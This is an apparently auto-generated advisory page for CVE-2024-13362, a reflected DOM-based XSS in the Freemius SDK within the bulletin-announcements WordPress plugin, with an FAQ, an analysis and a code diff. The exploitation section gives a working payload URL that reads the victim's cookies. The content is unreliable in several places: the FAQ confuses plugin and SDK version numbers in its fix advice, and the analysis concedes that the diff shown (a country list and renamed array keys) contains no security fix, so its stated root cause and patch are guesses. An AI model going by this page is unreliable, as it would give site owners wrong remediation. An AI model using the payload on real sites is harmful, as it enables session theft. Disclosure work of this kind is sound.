What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius SDK used in multiple WordPress plugins and themes. It allows unauthenticated attackers to inject arbitrary web scripts through the url parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when a crafted URL containing a malicious payload is clicked by a user. The vulnerable JavaScript reads the url parameter and injects it into the DOM without proper escaping, allowing the execution of arbitrary scripts in the user’s browser.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or lower is potentially affected. Administrators should check their installed plugins and themes for the use of Freemius SDK to determine if they are at risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Freemius SDK in use on your WordPress site. If it is version 2.10.1 or earlier, your site is vulnerable. Additionally, you can test for the vulnerability by attempting to inject a malicious payload through the url parameter.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Freemius SDK to version 3.13.1 or later, where the issue has been patched. Additionally, ensure that all input parameters are properly sanitized and escaped in your own code.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not the most critical, it can still be exploited easily and may lead to significant consequences such as session hijacking or data theft.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web application via a URL parameter, which is then reflected back to the user’s browser. This type of XSS does not require persistent storage on the server and is executed immediately when the user clicks the link.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can craft a URL with a malicious payload that triggers an alert displaying the user’s cookies. This shows how easily an attacker can exploit the vulnerability by tricking a user into clicking a link.

Can this vulnerability be exploited without authentication?

Yes, this vulnerability can be exploited by unauthenticated users. An attacker does not need any special access or credentials to exploit this vulnerability, making it particularly dangerous.

What are the potential impacts of this vulnerability?

Successful exploitation can lead to various malicious actions, including session hijacking, credential theft, and redirection to phishing sites. Because the attack is reflected, only users who click on the malicious link are affected.

How can I protect my site from similar vulnerabilities in the future?

To protect against similar vulnerabilities, regularly update all plugins and themes, implement strict input validation and output escaping, and conduct regular security audits of your WordPress site. Additionally, consider using security plugins that can help identify and mitigate such risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (bulletin-announcements)

CVE ID CVE-2024-13362

Plugin bulletin-announcements

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.12.1

Patched Version 3.13.1

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This vulnerability is a reflected DOM-based Cross-Site Scripting (XSS) affecting the Freemius SDK (versions <= 2.10.1) used by multiple WordPress plugins and themes. The flaw exists because the url parameter is not properly sanitized or escaped before being used in client-side JavaScript. An unauthenticated attacker can execute arbitrary web scripts in a victim's browser by tricking them into clicking a crafted link. The CVSS score is 6.1 (Medium), with CWE-79.

Root Cause: The provided diff shows changes in two files under bulletin-announcements/admin/views/common/constants/. The first file, country-options.php, is entirely new and contains a static array of country data. The second file, icon-options.php, shows a refactoring where array keys like 'imageUrl' and 'imageSet' are renamed to 'image_url' and 'image_set'. Neither file directly processes the url parameter or performs output escaping on dynamic values. Atomic Edge research indicates that the actual vulnerable code likely resides in the Freemius SDK's JavaScript files or in PHP files that accept the url parameter and pass it to JavaScript without sanitization. The vulnerability is DOM-based, meaning the attack payload is processed by JavaScript in the browser rather than by the server. The missing sanitization allows an attacker to inject script content via the url parameter.

Exploitation: An attacker crafts a URL with a malicious payload in the url parameter, such as: https://victim-site.com/?url=javascript:alert(document.cookie). When a victim clicks the link, the vulnerable JavaScript reads the url parameter from the URL and injects it into the DOM without escaping. This can be used to steal cookies, redirect users to phishing sites, or perform other malicious actions. The attack requires no authentication and no previous interaction with the site beyond clicking the link.

Patch Analysis: The patch primarily refactors array key names for consistency (camelCase to snake_case) and adds a new country-options.php file. These changes do not by themselves fix the XSS vulnerability. Atomic Edge analysis suggests that the actual security fix is not shown in this particular diff excerpt. The complete patch would include sanitization of the url parameter using functions like esc_url() or wp_kses() in the PHP side, or proper encoding (e.g., encodeURIComponent) in the JavaScript side. The before state uses raw user input; the after state would escape it appropriately.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's session. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack is reflected, so only users who click a malicious link are affected. However, phishing campaigns can widely distribute such links. The vulnerability does not require authentication, making it trivially exploitable by any unauthenticated attacker.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/bulletin-announcements/admin/views/common/constants/country-options.php
+++ b/bulletin-announcements/admin/views/common/constants/country-options.php
@@ -0,0 +1,253 @@
+<?php
+
+$country_options = [
+  [ 'code' => 'AD', 'name' => 'Andorra' ],
+  [ 'code' => 'AE', 'name' => 'United Arab Emirates' ],
+  [ 'code' => 'AF', 'name' => 'Afghanistan' ],
+  [ 'code' => 'AG', 'name' => 'Antigua and Barbuda' ],
+  [ 'code' => 'AI', 'name' => 'Anguilla' ],
+  [ 'code' => 'AL', 'name' => 'Albania' ],
+  [ 'code' => 'AM', 'name' => 'Armenia' ],
+  [ 'code' => 'AO', 'name' => 'Angola' ],
+  [ 'code' => 'AQ', 'name' => 'Antarctica' ],
+  [ 'code' => 'AR', 'name' => 'Argentina' ],
+  [ 'code' => 'AS', 'name' => 'American Samoa' ],
+  [ 'code' => 'AT', 'name' => 'Austria' ],
+  [ 'code' => 'AU', 'name' => 'Australia' ],
+  [ 'code' => 'AW', 'name' => 'Aruba' ],
+  [ 'code' => 'AX', 'name' => 'Åland Islands' ],
+  [ 'code' => 'AZ', 'name' => 'Azerbaijan' ],
+  [ 'code' => 'BA', 'name' => 'Bosnia and Herzegovina' ],
+  [ 'code' => 'BB', 'name' => 'Barbados' ],
+  [ 'code' => 'BD', 'name' => 'Bangladesh' ],
+  [ 'code' => 'BE', 'name' => 'Belgium' ],
+  [ 'code' => 'BF', 'name' => 'Burkina Faso' ],
+  [ 'code' => 'BG', 'name' => 'Bulgaria' ],
+  [ 'code' => 'BH', 'name' => 'Bahrain' ],
+  [ 'code' => 'BI', 'name' => 'Burundi' ],
+  [ 'code' => 'BJ', 'name' => 'Benin' ],
+  [ 'code' => 'BL', 'name' => 'Saint Barthélemy' ],
+  [ 'code' => 'BM', 'name' => 'Bermuda' ],
+  [ 'code' => 'BN', 'name' => 'Brunei' ],
+  [ 'code' => 'BO', 'name' => 'Bolivia' ],
+  [ 'code' => 'BQ', 'name' => 'Caribbean Netherlands' ],
+  [ 'code' => 'BR', 'name' => 'Brazil' ],
+  [ 'code' => 'BS', 'name' => 'Bahamas' ],
+  [ 'code' => 'BT', 'name' => 'Bhutan' ],
+  [ 'code' => 'BV', 'name' => 'Bouvet Island' ],
+  [ 'code' => 'BW', 'name' => 'Botswana' ],
+  [ 'code' => 'BY', 'name' => 'Belarus' ],
+  [ 'code' => 'BZ', 'name' => 'Belize' ],
+  [ 'code' => 'CA', 'name' => 'Canada' ],
+  [ 'code' => 'CC', 'name' => 'Cocos Islands' ],
+  [ 'code' => 'CD', 'name' => 'Democratic Republic of the Congo' ],
+  [ 'code' => 'CF', 'name' => 'Central African Republic' ],
+  [ 'code' => 'CG', 'name' => 'Republic of the Congo' ],
+  [ 'code' => 'CH', 'name' => 'Switzerland' ],
+  [ 'code' => 'CI', 'name' => 'Ivory Coast' ],
+  [ 'code' => 'CK', 'name' => 'Cook Islands' ],
+  [ 'code' => 'CL', 'name' => 'Chile' ],
+  [ 'code' => 'CM', 'name' => 'Cameroon' ],
+  [ 'code' => 'CN', 'name' => 'China' ],
+  [ 'code' => 'CO', 'name' => 'Colombia' ],
+  [ 'code' => 'CR', 'name' => 'Costa Rica' ],
+  [ 'code' => 'CU', 'name' => 'Cuba' ],
+  [ 'code' => 'CV', 'name' => 'Cabo Verde' ],
+  [ 'code' => 'CW', 'name' => 'Curaçao' ],
+  [ 'code' => 'CX', 'name' => 'Christmas Island' ],
+  [ 'code' => 'CY', 'name' => 'Cyprus' ],
+  [ 'code' => 'CZ', 'name' => 'Czechia' ],
+  [ 'code' => 'DE', 'name' => 'Germany' ],
+  [ 'code' => 'DJ', 'name' => 'Djibouti' ],
+  [ 'code' => 'DK', 'name' => 'Denmark' ],
+  [ 'code' => 'DM', 'name' => 'Dominica' ],
+  [ 'code' => 'DO', 'name' => 'Dominican Republic' ],
+  [ 'code' => 'DZ', 'name' => 'Algeria' ],
+  [ 'code' => 'EC', 'name' => 'Ecuador' ],
+  [ 'code' => 'EE', 'name' => 'Estonia' ],
+  [ 'code' => 'EG', 'name' => 'Egypt' ],
+  [ 'code' => 'EH', 'name' => 'Western Sahara' ],
+  [ 'code' => 'ER', 'name' => 'Eritrea' ],
+  [ 'code' => 'ES', 'name' => 'Spain' ],
+  [ 'code' => 'ET', 'name' => 'Ethiopia' ],
+  [ 'code' => 'FI', 'name' => 'Finland' ],
+  [ 'code' => 'FJ', 'name' => 'Fiji' ],
+  [ 'code' => 'FK', 'name' => 'Falkland Islands' ],
+  [ 'code' => 'FM', 'name' => 'Micronesia' ],
+  [ 'code' => 'FO', 'name' => 'Faroe Islands' ],
+  [ 'code' => 'FR', 'name' => 'France' ],
+  [ 'code' => 'GA', 'name' => 'Gabon' ],
+  [ 'code' => 'GB', 'name' => 'United Kingdom' ],
+  [ 'code' => 'GD', 'name' => 'Grenada' ],
+  [ 'code' => 'GE', 'name' => 'Georgia' ],
+  [ 'code' => 'GF', 'name' => 'French Guiana' ],
+  [ 'code' => 'GG', 'name' => 'Guernsey' ],
+  [ 'code' => 'GH', 'name' => 'Ghana' ],
+  [ 'code' => 'GI', 'name' => 'Gibraltar' ],
+  [ 'code' => 'GL', 'name' => 'Greenland' ],
+  [ 'code' => 'GM', 'name' => 'Gambia' ],
+  [ 'code' => 'GN', 'name' => 'Guinea' ],
+  [ 'code' => 'GP', 'name' => 'Guadeloupe' ],
+  [ 'code' => 'GQ', 'name' => 'Equatorial Guinea' ],
+  [ 'code' => 'GR', 'name' => 'Greece' ],
+  [ 'code' => 'GS', 'name' => 'South Georgia and the South Sandwich Islands' ],
+  [ 'code' => 'GT', 'name' => 'Guatemala' ],
+  [ 'code' => 'GU', 'name' => 'Guam' ],
+  [ 'code' => 'GW', 'name' => 'Guinea-Bissau' ],
+  [ 'code' => 'GY', 'name' => 'Guyana' ],
+  [ 'code' => 'HK', 'name' => 'Hong Kong' ],
+  [ 'code' => 'HM', 'name' => 'Heard Island and McDonald Islands' ],
+  [ 'code' => 'HN', 'name' => 'Honduras' ],
+  [ 'code' => 'HR', 'name' => 'Croatia' ],
+  [ 'code' => 'HT', 'name' => 'Haiti' ],
+  [ 'code' => 'HU', 'name' => 'Hungary' ],
+  [ 'code' => 'ID', 'name' => 'Indonesia' ],
+  [ 'code' => 'IE', 'name' => 'Ireland' ],
+  [ 'code' => 'IL', 'name' => 'Israel' ],
+  [ 'code' => 'IM', 'name' => 'Isle of Man' ],
+  [ 'code' => 'IN', 'name' => 'India' ],
+  [ 'code' => 'IO', 'name' => 'British Indian Ocean Territory' ],
+  [ 'code' => 'IQ', 'name' => 'Iraq' ],
+  [ 'code' => 'IR', 'name' => 'Iran' ],
+  [ 'code' => 'IS', 'name' => 'Iceland' ],
+  [ 'code' => 'IT', 'name' => 'Italy' ],
+  [ 'code' => 'JE', 'name' => 'Jersey' ],
+  [ 'code' => 'JM', 'name' => 'Jamaica' ],
+  [ 'code' => 'JO', 'name' => 'Jordan' ],
+  [ 'code' => 'JP', 'name' => 'Japan' ],
+  [ 'code' => 'KE', 'name' => 'Kenya' ],
+  [ 'code' => 'KG', 'name' => 'Kyrgyzstan' ],
+  [ 'code' => 'KH', 'name' => 'Cambodia' ],
+  [ 'code' => 'KI', 'name' => 'Kiribati' ],
+  [ 'code' => 'KM', 'name' => 'Comoros' ],
+  [ 'code' => 'KN', 'name' => 'Saint Kitts and Nevis' ],
+  [ 'code' => 'KP', 'name' => 'North Korea' ],
+  [ 'code' => 'KR', 'name' => 'South Korea' ],
+  [ 'code' => 'KW', 'name' => 'Kuwait' ],
+  [ 'code' => 'KY', 'name' => 'Cayman Islands' ],
+  [ 'code' => 'KZ', 'name' => 'Kazakhstan' ],
+  [ 'code' => 'LA', 'name' => 'Laos' ],
+  [ 'code' => 'LB', 'name' => 'Lebanon' ],
+  [ 'code' => 'LC', 'name' => 'Saint Lucia' ],
+  [ 'code' => 'LI', 'name' => 'Liechtenstein' ],
+  [ 'code' => 'LK', 'name' => 'Sri Lanka' ],
+  [ 'code' => 'LR', 'name' => 'Liberia' ],
+  [ 'code' => 'LS', 'name' => 'Lesotho' ],
+  [ 'code' => 'LT', 'name' => 'Lithuania' ],
+  [ 'code' => 'LU', 'name' => 'Luxembourg' ],
+  [ 'code' => 'LV', 'name' => 'Latvia' ],
+  [ 'code' => 'LY', 'name' => 'Libya' ],
+  [ 'code' => 'MA', 'name' => 'Morocco' ],
+  [ 'code' => 'MC', 'name' => 'Monaco' ],
+  [ 'code' => 'MD', 'name' => 'Moldova' ],
+  [ 'code' => 'ME', 'name' => 'Montenegro' ],
+  [ 'code' => 'MF', 'name' => 'Saint Martin' ],
+  [ 'code' => 'MG', 'name' => 'Madagascar' ],
+  [ 'code' => 'MH', 'name' => 'Marshall Islands' ],
+  [ 'code' => 'MK', 'name' => 'North Macedonia' ],
+  [ 'code' => 'ML', 'name' => 'Mali' ],
+  [ 'code' => 'MM', 'name' => 'Myanmar' ],
+  [ 'code' => 'MN', 'name' => 'Mongolia' ],
+  [ 'code' => 'MO', 'name' => 'Macao' ],
+  [ 'code' => 'MP', 'name' => 'Northern Mariana Islands' ],
+  [ 'code' => 'MQ', 'name' => 'Martinique' ],
+  [ 'code' => 'MR', 'name' => 'Mauritania' ],
+  [ 'code' => 'MS', 'name' => 'Montserrat' ],
+  [ 'code' => 'MT', 'name' => 'Malta' ],
+  [ 'code' => 'MU', 'name' => 'Mauritius' ],
+  [ 'code' => 'MV', 'name' => 'Maldives' ],
+  [ 'code' => 'MW', 'name' => 'Malawi' ],
+  [ 'code' => 'MX', 'name' => 'Mexico' ],
+  [ 'code' => 'MY', 'name' => 'Malaysia' ],
+  [ 'code' => 'MZ', 'name' => 'Mozambique' ],
+  [ 'code' => 'NA', 'name' => 'Namibia' ],
+  [ 'code' => 'NC', 'name' => 'New Caledonia' ],
+  [ 'code' => 'NE', 'name' => 'Niger' ],
+  [ 'code' => 'NF', 'name' => 'Norfolk Island' ],
+  [ 'code' => 'NG', 'name' => 'Nigeria' ],
+  [ 'code' => 'NI', 'name' => 'Nicaragua' ],
+  [ 'code' => 'NL', 'name' => 'Netherlands' ],
+  [ 'code' => 'NO', 'name' => 'Norway' ],
+  [ 'code' => 'NP', 'name' => 'Nepal' ],
+  [ 'code' => 'NR', 'name' => 'Nauru' ],
+  [ 'code' => 'NU', 'name' => 'Niue' ],
+  [ 'code' => 'NZ', 'name' => 'New Zealand' ],
+  [ 'code' => 'OM', 'name' => 'Oman' ],
+  [ 'code' => 'PA', 'name' => 'Panama' ],
+  [ 'code' => 'PE', 'name' => 'Peru' ],
+  [ 'code' => 'PF', 'name' => 'French Polynesia' ],
+  [ 'code' => 'PG', 'name' => 'Papua New Guinea' ],
+  [ 'code' => 'PH', 'name' => 'Philippines' ],
+  [ 'code' => 'PK', 'name' => 'Pakistan' ],
+  [ 'code' => 'PL', 'name' => 'Poland' ],
+  [ 'code' => 'PM', 'name' => 'Saint Pierre and Miquelon' ],
+  [ 'code' => 'PN', 'name' => 'Pitcairn' ],
+  [ 'code' => 'PR', 'name' => 'Puerto Rico' ],
+  [ 'code' => 'PS', 'name' => 'Palestine' ],
+  [ 'code' => 'PT', 'name' => 'Portugal' ],
+  [ 'code' => 'PW', 'name' => 'Palau' ],
+  [ 'code' => 'PY', 'name' => 'Paraguay' ],
+  [ 'code' => 'QA', 'name' => 'Qatar' ],
+  [ 'code' => 'RE', 'name' => 'Réunion' ],
+  [ 'code' => 'RO', 'name' => 'Romania' ],
+  [ 'code' => 'RS', 'name' => 'Serbia' ],
+  [ 'code' => 'RU', 'name' => 'Russia' ],
+  [ 'code' => 'RW', 'name' => 'Rwanda' ],
+  [ 'code' => 'SA', 'name' => 'Saudi Arabia' ],
+  [ 'code' => 'SB', 'name' => 'Solomon Islands' ],
+  [ 'code' => 'SC', 'name' => 'Seychelles' ],
+  [ 'code' => 'SD', 'name' => 'Sudan' ],
+  [ 'code' => 'SE', 'name' => 'Sweden' ],
+  [ 'code' => 'SG', 'name' => 'Singapore' ],
+  [ 'code' => 'SH', 'name' => 'Saint Helena, Ascension and Tristan da Cunha' ],
+  [ 'code' => 'SI', 'name' => 'Slovenia' ],
+  [ 'code' => 'SJ', 'name' => 'Svalbard and Jan Mayen' ],
+  [ 'code' => 'SK', 'name' => 'Slovakia' ],
+  [ 'code' => 'SL', 'name' => 'Sierra Leone' ],
+  [ 'code' => 'SM', 'name' => 'San Marino' ],
+  [ 'code' => 'SN', 'name' => 'Senegal' ],
+  [ 'code' => 'SO', 'name' => 'Somalia' ],
+  [ 'code' => 'SR', 'name' => 'Suriname' ],
+  [ 'code' => 'SS', 'name' => 'South Sudan' ],
+  [ 'code' => 'ST', 'name' => 'Sao Tome and Principe' ],
+  [ 'code' => 'SV', 'name' => 'El Salvador' ],
+  [ 'code' => 'SX', 'name' => 'Sint Maarten' ],
+  [ 'code' => 'SY', 'name' => 'Syria' ],
+  [ 'code' => 'SZ', 'name' => 'Eswatini' ],
+  [ 'code' => 'TC', 'name' => 'Turks and Caicos Islands' ],
+  [ 'code' => 'TD', 'name' => 'Chad' ],
+  [ 'code' => 'TF', 'name' => 'French Southern Territories' ],
+  [ 'code' => 'TG', 'name' => 'Togo' ],
+  [ 'code' => 'TH', 'name' => 'Thailand' ],
+  [ 'code' => 'TJ', 'name' => 'Tajikistan' ],
+  [ 'code' => 'TK', 'name' => 'Tokelau' ],
+  [ 'code' => 'TL', 'name' => 'Timor-Leste' ],
+  [ 'code' => 'TM', 'name' => 'Turkmenistan' ],
+  [ 'code' => 'TN', 'name' => 'Tunisia' ],
+  [ 'code' => 'TO', 'name' => 'Tonga' ],
+  [ 'code' => 'TR', 'name' => 'Turkey' ],
+  [ 'code' => 'TT', 'name' => 'Trinidad and Tobago' ],
+  [ 'code' => 'TV', 'name' => 'Tuvalu' ],
+  [ 'code' => 'TW', 'name' => 'Taiwan' ],
+  [ 'code' => 'TZ', 'name' => 'Tanzania' ],
+  [ 'code' => 'UA', 'name' => 'Ukraine' ],
+  [ 'code' => 'UG', 'name' => 'Uganda' ],
+  [ 'code' => 'UM', 'name' => 'United States Minor Outlying Islands' ],
+  [ 'code' => 'US', 'name' => 'United States of America' ],
+  [ 'code' => 'UY', 'name' => 'Uruguay' ],
+  [ 'code' => 'UZ', 'name' => 'Uzbekistan' ],
+  [ 'code' => 'VA', 'name' => 'Holy See' ],
+  [ 'code' => 'VC', 'name' => 'Saint Vincent and the Grenadines' ],
+  [ 'code' => 'VE', 'name' => 'Venezuela' ],
+  [ 'code' => 'VG', 'name' => 'Virgin Islands (UK)' ],
+  [ 'code' => 'VI', 'name' => 'Virgin Islands (US)' ],
+  [ 'code' => 'VN', 'name' => 'Vietnam' ],
+  [ 'code' => 'VU', 'name' => 'Vanuatu' ],
+  [ 'code' => 'WF', 'name' => 'Wallis and Futuna' ],
+  [ 'code' => 'WS', 'name' => 'Samoa' ],
+  [ 'code' => 'YE', 'name' => 'Yemen' ],
+  [ 'code' => 'YT', 'name' => 'Mayotte' ],
+  [ 'code' => 'ZA', 'name' => 'South Africa' ],
+  [ 'code' => 'ZM', 'name' => 'Zambia' ],
+  [ 'code' => 'ZW', 'name' => 'Zimbabwe' ],
+];
--- a/bulletin-announcements/admin/views/common/constants/icon-options.php
+++ b/bulletin-announcements/admin/views/common/constants/icon-options.php
@@ -2,424 +2,424 @@

 $icon_options = [
   [
-    'value' => 'announcement',
-    'label' => esc_html__( 'Announcement', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/announcement.svg',
-    'imageSet'=> 'original',
+    'value'     => 'announcement',
+    'label'     => esc_html__( 'Announcement', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/announcement.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'book',
-    'label' => esc_html__( 'Book', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/book.svg',
-    'imageSet'=> 'original'
+    'value'     => 'book',
+    'label'     => esc_html__( 'Book', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/book.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'briefcase',
-    'label' => esc_html__( 'Briefcase', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/briefcase.svg',
-    'imageSet'=> 'original'
+    'value'     => 'briefcase',
+    'label'     => esc_html__( 'Briefcase', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/briefcase.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'calander',
-    'label' => esc_html__( 'Calendar', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/calander.svg',
-    'imageSet'=> 'original'
+    'value'     => 'calander',
+    'label'     => esc_html__( 'Calendar', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/calander.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'chat',
-    'label' => esc_html__( 'Chat', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/chat.svg',
-    'imageSet'=> 'original'
+    'value'     => 'chat',
+    'label'     => esc_html__( 'Chat', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/chat.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'check-circle',
-    'label' => esc_html__( 'Check circle', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/check-circle.svg',
-    'imageSet'=> 'original'
+    'value'     => 'check-circle',
+    'label'     => esc_html__( 'Check circle', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/check-circle.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'clip',
-    'label' => esc_html__( 'Clip', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clip.svg',
-    'imageSet'=> 'original'
+    'value'     => 'clip',
+    'label'     => esc_html__( 'Clip', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clip.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'clock',
-    'label' => esc_html__( 'Clock', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clock.svg',
-    'imageSet'=> 'original'
+    'value'     => 'clock',
+    'label'     => esc_html__( 'Clock', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clock.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'cookie-black',
-    'label' => esc_html__( 'Cookie black', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/cookie-black.svg',
-    'imageSet'=> 'original'
+    'value'     => 'cookie-black',
+    'label'     => esc_html__( 'Cookie black', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/cookie-black.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'emotion-happy',
-    'label' => esc_html__( 'Emotion happy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/emotion-happy.svg',
-    'imageSet'=> 'original'
+    'value'     => 'emotion-happy',
+    'label'     => esc_html__( 'Emotion happy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/emotion-happy.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'emotion-sad',
-    'label' => esc_html__( 'Emotion sad', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/emotion-sad.svg',
-    'imageSet'=> 'original'
+    'value'     => 'emotion-sad',
+    'label'     => esc_html__( 'Emotion sad', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/emotion-sad.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'exclamation',
-    'label' => esc_html__( 'Exclamation', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/exclamation.svg',
-    'imageSet'=> 'original'
+    'value'     => 'exclamation',
+    'label'     => esc_html__( 'Exclamation', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/exclamation.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'heart',
-    'label' => esc_html__( 'Heart', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/heart.svg',
-    'imageSet'=> 'original'
+    'value'     => 'heart',
+    'label'     => esc_html__( 'Heart', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/heart.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'help',
-    'label' => esc_html__( 'Help', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/help.svg',
-    'imageSet'=> 'original'
+    'value'     => 'help',
+    'label'     => esc_html__( 'Help', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/help.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'information',
-    'label' => esc_html__( 'Information', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/information.svg',
-    'imageSet'=> 'original'
+    'value'     => 'information',
+    'label'     => esc_html__( 'Information', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/information.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'key',
-    'label' => esc_html__( 'Key', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/key.svg',
-    'imageSet'=> 'original'
+    'value'     => 'key',
+    'label'     => esc_html__( 'Key', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/key.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'location',
-    'label' => esc_html__( 'Location', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/location.svg',
-    'imageSet'=> 'original'
+    'value'     => 'location',
+    'label'     => esc_html__( 'Location', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/location.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'moon',
-    'label' => esc_html__( 'Moon', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/moon.svg',
-    'imageSet'=> 'original'
+    'value'     => 'moon',
+    'label'     => esc_html__( 'Moon', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/moon.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'music',
-    'label' => esc_html__( 'Music', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/music.svg',
-    'imageSet'=> 'original'
+    'value'     => 'music',
+    'label'     => esc_html__( 'Music', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/music.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'notification',
-    'label' => esc_html__( 'Notification', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/notification.svg',
-    'imageSet'=> 'original'
+    'value'     => 'notification',
+    'label'     => esc_html__( 'Notification', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/notification.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'rocket',
-    'label' => esc_html__( 'Rocket', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/rocket.svg',
-    'imageSet'=> 'original'
+    'value'     => 'rocket',
+    'label'     => esc_html__( 'Rocket', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/rocket.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'star',
-    'label' => esc_html__( 'Star', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/star.svg',
-    'imageSet'=> 'original'
+    'value'     => 'star',
+    'label'     => esc_html__( 'Star', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/star.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'thumb-up',
-    'label' => esc_html__( 'Thumb up', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/thumb-up.svg',
-    'imageSet'=> 'original'
+    'value'     => 'thumb-up',
+    'label'     => esc_html__( 'Thumb up', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/thumb-up.svg',
+    'image_set' => 'original',
   ],
   [
-    'value' => 'trophy',
-    'label' => esc_html__( 'Trophy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/trophy.svg',
-    'imageSet'=> 'original'
+    'value'     => 'trophy',
+    'label'     => esc_html__( 'Trophy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/trophy.svg',
+    'image_set' => 'original',
   ],
   // New Icons Below
   [
-    'value' => 'announcement-o',
-    'label' => esc_html__( 'Announcement', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/announcement-o.svg',
-    'imageSet'=> 'outline',
+    'value'     => 'announcement-o',
+    'label'     => esc_html__( 'Announcement', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/announcement-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'announcement-s',
-    'label' => esc_html__( 'Announcement', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/announcement-s.svg',
-    'imageSet'=> 'solid',
+    'value'     => 'announcement-s',
+    'label'     => esc_html__( 'Announcement', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/announcement-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'book-o',
-    'label' => esc_html__( 'Book', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/book-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'book-o',
+    'label'     => esc_html__( 'Book', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/book-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'book-s',
-    'label' => esc_html__( 'Book', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/book-s.svg',
